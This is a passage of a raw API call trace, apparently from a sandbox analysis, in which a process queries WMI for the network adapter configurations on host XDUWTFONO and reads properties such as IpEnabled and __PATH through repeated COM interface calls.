WbemDefPath:IUnknown:AddRef (This=0x5220240) returned 0x3 [0197.616] WbemDefPath:IUnknown:QueryInterface (in: This=0x5220240, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d8cc | out: ppvObject=0x26d8cc*=0x0) returned 0x80004002 [0197.616] WbemDefPath:IUnknown:QueryInterface (in: This=0x5220240, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d87c | out: ppvObject=0x26d87c*=0x0) returned 0x80004002 [0197.616] WbemDefPath:IUnknown:QueryInterface (in: This=0x5220240, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d888 | out: ppvObject=0x26d888*=0x767ff8) returned 0x0 [0197.616] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x767ff8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d890 | out: pCid=0x26d890*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.616] WbemDefPath:IUnknown:Release (This=0x767ff8) returned 0x3 [0197.616] CoGetContextToken (in: pToken=0x26d8e8 | out: pToken=0x26d8e8) returned 0x0 [0197.616] CoGetContextToken (in: pToken=0x26dcf0 | out: pToken=0x26dcf0) returned 0x0 [0197.616] WbemDefPath:IUnknown:QueryInterface (in: This=0x5220240, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dd80 | out: ppvObject=0x26dd80*=0x0) returned 0x80004002 [0197.617] WbemDefPath:IUnknown:Release (This=0x5220240) returned 0x2 [0197.617] WbemDefPath:IUnknown:Release (This=0x5220240) returned 0x1 [0197.617] CoGetContextToken (in: pToken=0x26e678 | out: pToken=0x26e678) returned 0x0 [0197.617] CoGetContextToken (in: pToken=0x26e5d8 | out: pToken=0x26e5d8) returned 0x0 [0197.617] WbemDefPath:IUnknown:QueryInterface (in: This=0x5220240, riid=0x26e6a8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x26e6a4 | out: ppvObject=0x26e6a4*=0x5220240) returned 0x0 [0197.617] WbemDefPath:IUnknown:AddRef (This=0x5220240) returned 0x3 [0197.617] WbemDefPath:IUnknown:Release (This=0x5220240) returned 0x2 [0197.617] WbemDefPath:IWbemPath:SetText (This=0x5220240, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=8") returned 0x0 [0197.617] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e828 | out: puCount=0x26e828*=0x2) returned 0x0 [0197.617] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0x0, pszText=0x0 | out: puBuffLength=0x26e824*=0xf, pszText=0x0) returned 0x0 [0197.617] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e824*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.617] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e7f4 | out: puCount=0x26e7f4*=0x2) returned 0x0 [0197.617] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0x0, pszText=0x0 | out: puBuffLength=0x26e7f0*=0xf, pszText=0x0) returned 0x0 [0197.617] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e7f0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.617] IWbemClassObject:Get (in: This=0x52200a8, wszName="IpEnabled", lFlags=0, pVal=0x26e7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257af58*=0, plFlavor=0x257af5c*=0 | out: pVal=0x26e7f0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257af58*=11, plFlavor=0x257af5c*=0) returned 0x0 [0197.617] IWbemClassObject:Get (in: This=0x52200a8, wszName="IpEnabled", lFlags=0, pVal=0x26e7f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257af58*=11, plFlavor=0x257af5c*=0 | out: pVal=0x26e7f8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257af58*=11, plFlavor=0x257af5c*=0) returned 0x0 [0197.617] CoTaskMemAlloc (cb=0x4) returned 0x768038 [0197.617] IEnumWbemClassObject:Next (in: This=0x5210bbc, lTimeout=-1, uCount=0x1, apObjects=0x768038, puReturned=0x2576450 | out: apObjects=0x768038*=0x52231d8, puReturned=0x2576450*=0x1) returned 0x0 [0197.618] IUnknown:QueryInterface (in: This=0x52231d8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26de60 | out: ppvObject=0x26de60*=0x52231d8) returned 0x0 [0197.618] IUnknown:QueryInterface (in: This=0x52231d8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26de1c | out: ppvObject=0x26de1c*=0x0) returned 0x80004002 [0197.618] IUnknown:QueryInterface (in: This=0x52231d8, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26dc3c | out: ppvObject=0x26dc3c*=0x0) returned 0x80004002 [0197.618] IUnknown:AddRef (This=0x52231d8) returned 0x3 [0197.618] IUnknown:QueryInterface (in: This=0x52231d8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d77c | out: ppvObject=0x26d77c*=0x0) returned 0x80004002 [0197.619] IUnknown:QueryInterface (in: This=0x52231d8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d72c | out: ppvObject=0x26d72c*=0x0) returned 0x80004002 [0197.619] IUnknown:QueryInterface (in: This=0x52231d8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d738 | out: ppvObject=0x26d738*=0x52231dc) returned 0x0 [0197.619] IMarshal:GetUnmarshalClass (in: This=0x52231dc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d740 | out: pCid=0x26d740*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0197.619] IUnknown:Release (This=0x52231dc) returned 0x3 [0197.619] CoGetContextToken (in: pToken=0x26d798 | out: pToken=0x26d798) returned 0x0 [0197.619] CoGetContextToken (in: pToken=0x26dba0 | out: pToken=0x26dba0) returned 0x0 [0197.619] IUnknown:QueryInterface (in: This=0x52231d8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dc30 | out: ppvObject=0x26dc30*=0x0) returned 0x80004002 [0197.619] IUnknown:Release (This=0x52231d8) returned 0x2 [0197.619] CoGetContextToken (in: pToken=0x26e170 | out: pToken=0x26e170) returned 0x0 [0197.619] CoGetContextToken (in: pToken=0x26e0d0 | out: pToken=0x26e0d0) returned 0x0 [0197.619] IUnknown:QueryInterface (in: This=0x52231d8, riid=0x26e1a0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26e19c | out: ppvObject=0x26e19c*=0x52231d8) returned 0x0 [0197.619] IUnknown:AddRef (This=0x52231d8) returned 0x4 [0197.619] IUnknown:Release (This=0x52231d8) returned 0x3 [0197.619] IUnknown:Release (This=0x52231d8) returned 0x2 [0197.619] CoTaskMemFree (pv=0x768038) [0197.619] CoGetContextToken (in: pToken=0x26e4d8 | out: pToken=0x26e4d8) returned 0x0 [0197.619] IUnknown:AddRef (This=0x52231d8) returned 0x3 [0197.619] IWbemClassObject:Get (in: This=0x52231d8, wszName="__GENUS", lFlags=0, pVal=0x26e7ec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e86c*=0, plFlavor=0x26e868*=0 | out: pVal=0x26e7ec*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x26e86c*=3, plFlavor=0x26e868*=64) returned 0x0 [0197.619] IWbemClassObject:Get (in: This=0x52231d8, wszName="__PATH", lFlags=0, pVal=0x26e7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e854*=0, plFlavor=0x26e850*=0 | out: pVal=0x26e7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=9", varVal2=0x0), pType=0x26e854*=8, plFlavor=0x26e850*=64) returned 0x0 [0197.619] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=9") returned 0x80 [0197.619] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=9") returned 0x80 [0197.619] CoGetObjectContext (in: riid=0x224f510*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e7fc | out: ppv=0x26e7fc*=0x6ded34) returned 0x0 [0197.619] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26e7f4 | out: pAptType=0x26e7f4*=1) returned 0x0 [0197.620] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x224f4f8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26e7f8 | out: ppvObject=0x26e7f8*=0x0) returned 0x80004002 [0197.620] IUnknown:Release (This=0x6ded34) returned 0x1 [0197.620] CoGetClassObject (in: rclsid=0x700824*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e168 | out: ppv=0x26e168*=0x52235d8) returned 0x0 [0197.620] WbemDefPath:IUnknown:QueryInterface (in: This=0x52235d8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26e380 | out: ppvObject=0x26e380*=0x0) returned 0x80004002 [0197.620] WbemDefPath:IClassFactory:CreateInstance (in: This=0x52235d8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e394 | out: ppvObject=0x26e394*=0x52239c0) returned 0x0 [0197.620] WbemDefPath:IUnknown:Release (This=0x52235d8) returned 0x0 [0197.620] WbemDefPath:IUnknown:QueryInterface (in: This=0x52239c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dfb4 | out: ppvObject=0x26dfb4*=0x52239c0) returned 0x0 [0197.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x52239c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26df70 | out: ppvObject=0x26df70*=0x0) returned 0x80004002 [0197.621] WbemDefPath:IUnknown:AddRef (This=0x52239c0) returned 0x3 [0197.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x52239c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d8cc | out: ppvObject=0x26d8cc*=0x0) returned 0x80004002 [0197.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x52239c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d87c | out: ppvObject=0x26d87c*=0x0) returned 0x80004002 [0197.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x52239c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d888 | out: ppvObject=0x26d888*=0x768038) returned 0x0 [0197.621] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x768038, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d890 | out: pCid=0x26d890*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.621] WbemDefPath:IUnknown:Release (This=0x768038) returned 0x3 [0197.621] CoGetContextToken (in: pToken=0x26d8e8 | out: pToken=0x26d8e8) returned 0x0 [0197.621] CoGetContextToken (in: pToken=0x26dcf0 | out: pToken=0x26dcf0) returned 0x0 [0197.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x52239c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dd80 | out: ppvObject=0x26dd80*=0x0) returned 0x80004002 [0197.621] WbemDefPath:IUnknown:Release (This=0x52239c0) returned 0x2 [0197.621] WbemDefPath:IUnknown:Release (This=0x52239c0) returned 0x1 [0197.621] CoGetContextToken (in: pToken=0x26e678 | out: pToken=0x26e678) returned 0x0 [0197.621] CoGetContextToken (in: pToken=0x26e5d8 | out: pToken=0x26e5d8) returned 0x0 [0197.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x52239c0, riid=0x26e6a8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x26e6a4 | out: ppvObject=0x26e6a4*=0x52239c0) returned 0x0 [0197.621] WbemDefPath:IUnknown:AddRef (This=0x52239c0) returned 0x3 [0197.621] WbemDefPath:IUnknown:Release (This=0x52239c0) returned 0x2 [0197.621] WbemDefPath:IWbemPath:SetText (This=0x52239c0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=9") returned 0x0 [0197.621] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e828 | out: puCount=0x26e828*=0x2) returned 0x0 [0197.621] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0x0, pszText=0x0 | out: puBuffLength=0x26e824*=0xf, pszText=0x0) returned 0x0 [0197.621] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e824*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.621] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e7f4 | out: puCount=0x26e7f4*=0x2) returned 0x0 [0197.621] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0x0, pszText=0x0 | out: puBuffLength=0x26e7f0*=0xf, pszText=0x0) returned 0x0 [0197.621] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e7f0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.622] IWbemClassObject:Get (in: This=0x52231d8, wszName="IpEnabled", lFlags=0, pVal=0x26e7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257b790*=0, plFlavor=0x257b794*=0 | out: pVal=0x26e7f0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257b790*=11, plFlavor=0x257b794*=0) returned 0x0 [0197.622] IWbemClassObject:Get (in: This=0x52231d8, wszName="IpEnabled", lFlags=0, pVal=0x26e7f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257b790*=11, plFlavor=0x257b794*=0 | out: pVal=0x26e7f8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257b790*=11, plFlavor=0x257b794*=0) returned 0x0 [0197.622] CoTaskMemAlloc (cb=0x4) returned 0x768078 [0197.622] IEnumWbemClassObject:Next (in: This=0x5210bbc, lTimeout=-1, uCount=0x1, apObjects=0x768078, puReturned=0x2576450 | out: apObjects=0x768078*=0x5223ac0, puReturned=0x2576450*=0x1) returned 0x0 [0197.622] IUnknown:QueryInterface (in: This=0x5223ac0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26de60 | out: ppvObject=0x26de60*=0x5223ac0) returned 0x0 [0197.623] IUnknown:QueryInterface (in: This=0x5223ac0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26de1c | out: ppvObject=0x26de1c*=0x0) returned 0x80004002 [0197.623] IUnknown:QueryInterface (in: This=0x5223ac0, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26dc3c | out: ppvObject=0x26dc3c*=0x0) returned 0x80004002 [0197.623] IUnknown:AddRef (This=0x5223ac0) returned 0x3 [0197.623] IUnknown:QueryInterface (in: This=0x5223ac0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d77c | out: ppvObject=0x26d77c*=0x0) returned 0x80004002 [0197.623] IUnknown:QueryInterface (in: This=0x5223ac0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d72c | out: ppvObject=0x26d72c*=0x0) returned 0x80004002 [0197.623] IUnknown:QueryInterface (in: This=0x5223ac0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d738 | out: ppvObject=0x26d738*=0x5223ac4) returned 0x0 [0197.623] IMarshal:GetUnmarshalClass (in: This=0x5223ac4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d740 | out: pCid=0x26d740*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0197.623] IUnknown:Release (This=0x5223ac4) returned 0x3 [0197.623] CoGetContextToken (in: pToken=0x26d798 | out: pToken=0x26d798) returned 0x0 [0197.623] CoGetContextToken (in: pToken=0x26dba0 | out: pToken=0x26dba0) returned 0x0 [0197.623] IUnknown:QueryInterface (in: This=0x5223ac0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dc30 | out: ppvObject=0x26dc30*=0x0) returned 0x80004002 [0197.623] IUnknown:Release (This=0x5223ac0) returned 0x2 [0197.623] CoGetContextToken (in: pToken=0x26e170 | out: pToken=0x26e170) returned 0x0 [0197.623] CoGetContextToken (in: pToken=0x26e0d0 | out: pToken=0x26e0d0) returned 0x0 [0197.623] IUnknown:QueryInterface (in: This=0x5223ac0, riid=0x26e1a0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26e19c | out: ppvObject=0x26e19c*=0x5223ac0) returned 0x0 [0197.623] IUnknown:AddRef (This=0x5223ac0) returned 0x4 [0197.623] IUnknown:Release (This=0x5223ac0) returned 0x3 [0197.623] IUnknown:Release (This=0x5223ac0) returned 0x2 [0197.623] CoTaskMemFree (pv=0x768078) [0197.623] CoGetContextToken (in: pToken=0x26e4d8 | out: pToken=0x26e4d8) returned 0x0 [0197.623] IUnknown:AddRef (This=0x5223ac0) returned 0x3 [0197.623] IWbemClassObject:Get (in: This=0x5223ac0, wszName="__GENUS", lFlags=0, pVal=0x26e7ec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e86c*=0, plFlavor=0x26e868*=0 | out: pVal=0x26e7ec*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x26e86c*=3, plFlavor=0x26e868*=64) returned 0x0 [0197.624] IWbemClassObject:Get (in: This=0x5223ac0, wszName="__PATH", lFlags=0, pVal=0x26e7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e854*=0, plFlavor=0x26e850*=0 | out: pVal=0x26e7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=10", varVal2=0x0), pType=0x26e854*=8, plFlavor=0x26e850*=64) returned 0x0 [0197.624] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=10") returned 0x82 [0197.624] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=10") returned 0x82 [0197.624] CoGetObjectContext (in: riid=0x224f510*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e7fc | out: ppv=0x26e7fc*=0x6ded34) returned 0x0 [0197.624] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26e7f4 | out: pAptType=0x26e7f4*=1) returned 0x0 [0197.624] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x224f4f8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26e7f8 | out: ppvObject=0x26e7f8*=0x0) returned 0x80004002 [0197.624] IUnknown:Release (This=0x6ded34) returned 0x1 [0197.625] CoGetClassObject (in: rclsid=0x700824*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e168 | out: ppv=0x26e168*=0x52235e8) returned 0x0 [0197.625] WbemDefPath:IUnknown:QueryInterface (in: This=0x52235e8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26e380 | out: ppvObject=0x26e380*=0x0) returned 0x80004002 [0197.625] WbemDefPath:IClassFactory:CreateInstance (in: This=0x52235e8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e394 | out: ppvObject=0x26e394*=0x5223df8) returned 0x0 [0197.625] WbemDefPath:IUnknown:Release (This=0x52235e8) returned 0x0 [0197.625] WbemDefPath:IUnknown:QueryInterface (in: This=0x5223df8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, 